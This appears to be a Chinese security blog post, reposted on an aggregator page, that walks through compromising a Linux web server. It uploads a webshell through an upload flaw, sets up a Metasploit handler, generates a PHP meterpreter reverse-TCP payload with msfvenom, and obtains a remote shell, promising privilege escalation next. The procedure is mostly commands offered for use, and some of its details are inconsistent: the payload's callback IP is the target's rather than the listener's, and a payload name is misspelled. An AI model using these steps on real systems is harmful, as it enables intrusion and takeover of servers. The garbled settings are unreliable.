会员服务

msf实现linux shell反弹

2019 年 8 月 16 日 黑白之道


运行环境:


kali       ip:192.168.123.90
Linux    ip:192.168.123.5


Linux服务器上开有80端口,并且有上传漏洞,具体如何绕过就不多讲,主要讲的是msf生成木马反弹linux shell。


话不多说,上传一句话,菜刀连接。


然后打开kali 并启动msf


进入 >   use exploit/multi/handler
设置 payload>   set payload php/metrpreter/reverse_tcp



设置IP  > set lhost 192.168.123.90



查看一下参数>show options



没啥问题开始监听>run



再在终端上生产msf木马


msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php


然后将产生的木马用小马上传上去,并且在浏览器上访问



我们再看msf发现已经有会话反弹过来了,我们接下来看一下



然后我们查看并进入会话查看信息


进入shell



上面已经进入shell 并且执行的ls命令,下面让我们看下权限



是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。


本人也是小菜,望大佬勿喷。

有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。

你可能喜欢

看我如何利用微信反弹shell

不知道密码的情况下hacking mysql并反弹shell

zabbix反弹shell并拿下系统root权限

登录查看更多
49

相关内容

【2020新书】实战R语言4,323页pdf
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【实用书】流数据处理,Streaming Data,219页pdf
【实用书】流数据处理,Streaming Data,219页pdf
专知会员服务
76+阅读 · 2020年4月24日
【干货书】实战推荐系统,Practical Recommender Systems,432页pdf
【干货书】实战推荐系统,Practical Recommender Systems,432页pdf
专知会员服务
178+阅读 · 2020年4月17日
【WWW2020-微软】理解用户行为用于文档推荐
【WWW2020-微软】理解用户行为用于文档推荐
专知会员服务
35+阅读 · 2020年4月5日
对话推荐系统综述论文,35页pdf,A Survey on Conversational Recommender Systems
对话推荐系统综述论文,35页pdf,A Survey on Conversational Recommender Systems
专知会员服务
115+阅读 · 2020年4月3日
【干货书】流畅Python,766页pdf,中英文版
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
深度神经网络实时物联网图像处理,241页pdf
深度神经网络实时物联网图像处理,241页pdf
专知会员服务
76+阅读 · 2020年3月15日
【ICLR2020-MIT】元学习的好奇心算法,Meta-learning curiosity algorithms
【ICLR2020-MIT】元学习的好奇心算法,Meta-learning curiosity algorithms
专知会员服务
33+阅读 · 2020年3月13日
【电子书】C++ Primer Plus 第6版,附PDF
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
用 Python 开发 Excel 宏脚本的神器
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
后渗透利用msf关闭防火墙
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
Webkiller 简单利用
Webkiller 简单利用
黑白之道
11+阅读 · 2019年6月11日
Linux挖矿病毒的清除与分析
Linux挖矿病毒的清除与分析
FreeBuf
14+阅读 · 2019年4月15日
支持多标签页的Windows终端:Fluent 终端
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
DiscuzX 3.4 Phar反序列化漏洞
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
文本数据分析(三):用Python实现文本数据预处理
文本数据分析(三):用Python实现文本数据预处理
论智
7+阅读 · 2018年4月12日
实战 | 40行代码实现人脸识别
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
设计和实现一款轻量级的爬虫框架
设计和实现一款轻量级的爬虫框架
架构文摘
13+阅读 · 2018年1月17日
教你用Python来玩跳一跳
教你用Python来玩跳一跳
七月在线实验室
6+阅读 · 2018年1月2日
A Survey on Edge Computing Systems and Tools
Arxiv
35+阅读 · 2019年11月7日
A Sketch-Based System for Semantic Parsing
A Sketch-Based System for Semantic Parsing
Arxiv
4+阅读 · 2019年9月12日
Collaborative Similarity Embedding for Recommender Systems
Arxiv
8+阅读 · 2019年2月19日
Viscovery: Trend Tracking in Opinion Forums based on Dynamic Topic Models
Arxiv
5+阅读 · 2018年5月1日
Horizontal Pyramid Matching for Person Re-identification
Arxiv
3+阅读 · 2018年4月30日
Improving Temporal Relation Extraction with a Globally Acquired Statistical Resource
Arxiv
5+阅读 · 2018年4月17日
Stacked Cross Attention for Image-Text Matching
Arxiv
3+阅读 · 2018年3月21日
Collaborative Autoencoder for Recommender Systems
Arxiv
9+阅读 · 2018年1月30日
Learning Tree-based Deep Model for Recommender Systems
Arxiv
7+阅读 · 2018年1月8日
Practical sketching algorithms for low-rank matrix approximation
Arxiv
4+阅读 · 2018年1月2日
VIP会员
相关主题
Shell
Linux
PHP
情景
服务器
CP
相关VIP内容
【2020新书】实战R语言4,323页pdf
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【实用书】流数据处理,Streaming Data,219页pdf
【实用书】流数据处理,Streaming Data,219页pdf
专知会员服务
76+阅读 · 2020年4月24日
【干货书】实战推荐系统,Practical Recommender Systems,432页pdf
【干货书】实战推荐系统,Practical Recommender Systems,432页pdf
专知会员服务
178+阅读 · 2020年4月17日
【WWW2020-微软】理解用户行为用于文档推荐
【WWW2020-微软】理解用户行为用于文档推荐
专知会员服务
35+阅读 · 2020年4月5日
对话推荐系统综述论文,35页pdf,A Survey on Conversational Recommender Systems
对话推荐系统综述论文,35页pdf,A Survey on Conversational Recommender Systems
专知会员服务
115+阅读 · 2020年4月3日
【干货书】流畅Python,766页pdf,中英文版
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
深度神经网络实时物联网图像处理,241页pdf
深度神经网络实时物联网图像处理,241页pdf
专知会员服务
76+阅读 · 2020年3月15日
【ICLR2020-MIT】元学习的好奇心算法,Meta-learning curiosity algorithms
【ICLR2020-MIT】元学习的好奇心算法,Meta-learning curiosity algorithms
专知会员服务
33+阅读 · 2020年3月13日
【电子书】C++ Primer Plus 第6版,附PDF
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
热门VIP内容
相关资讯
用 Python 开发 Excel 宏脚本的神器
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
后渗透利用msf关闭防火墙
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
Webkiller 简单利用
Webkiller 简单利用
黑白之道
11+阅读 · 2019年6月11日
Linux挖矿病毒的清除与分析
Linux挖矿病毒的清除与分析
FreeBuf
14+阅读 · 2019年4月15日
支持多标签页的Windows终端:Fluent 终端
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
DiscuzX 3.4 Phar反序列化漏洞
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
文本数据分析(三):用Python实现文本数据预处理
文本数据分析(三):用Python实现文本数据预处理
论智
7+阅读 · 2018年4月12日
实战 | 40行代码实现人脸识别
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
设计和实现一款轻量级的爬虫框架
设计和实现一款轻量级的爬虫框架
架构文摘
13+阅读 · 2018年1月17日
教你用Python来玩跳一跳
教你用Python来玩跳一跳
七月在线实验室
6+阅读 · 2018年1月2日
相关论文
A Survey on Edge Computing Systems and Tools
Arxiv
35+阅读 · 2019年11月7日
A Sketch-Based System for Semantic Parsing
A Sketch-Based System for Semantic Parsing
Arxiv
4+阅读 · 2019年9月12日
Collaborative Similarity Embedding for Recommender Systems
Arxiv
8+阅读 · 2019年2月19日
Viscovery: Trend Tracking in Opinion Forums based on Dynamic Topic Models
Arxiv
5+阅读 · 2018年5月1日
Horizontal Pyramid Matching for Person Re-identification
Arxiv
3+阅读 · 2018年4月30日
Improving Temporal Relation Extraction with a Globally Acquired Statistical Resource
Arxiv
5+阅读 · 2018年4月17日
Stacked Cross Attention for Image-Text Matching
Arxiv
3+阅读 · 2018年3月21日
Collaborative Autoencoder for Recommender Systems
Arxiv
9+阅读 · 2018年1月30日
Learning Tree-based Deep Model for Recommender Systems
Arxiv
7+阅读 · 2018年1月8日
Practical sketching algorithms for low-rank matrix approximation
Arxiv
4+阅读 · 2018年1月2日
大家都在搜
  1. palantir
  2. 洛克菲勒
  3. 大型语言模型
  4. 无人机蜂群
  5. 自主武器
  6. 大模型
  7. 无人艇
  8. 智能推荐
  9. 笛卡尔
  10. 出海产品从 0 到 1 该怎么做
    11.
Top
微信扫码咨询专知VIP会员
Top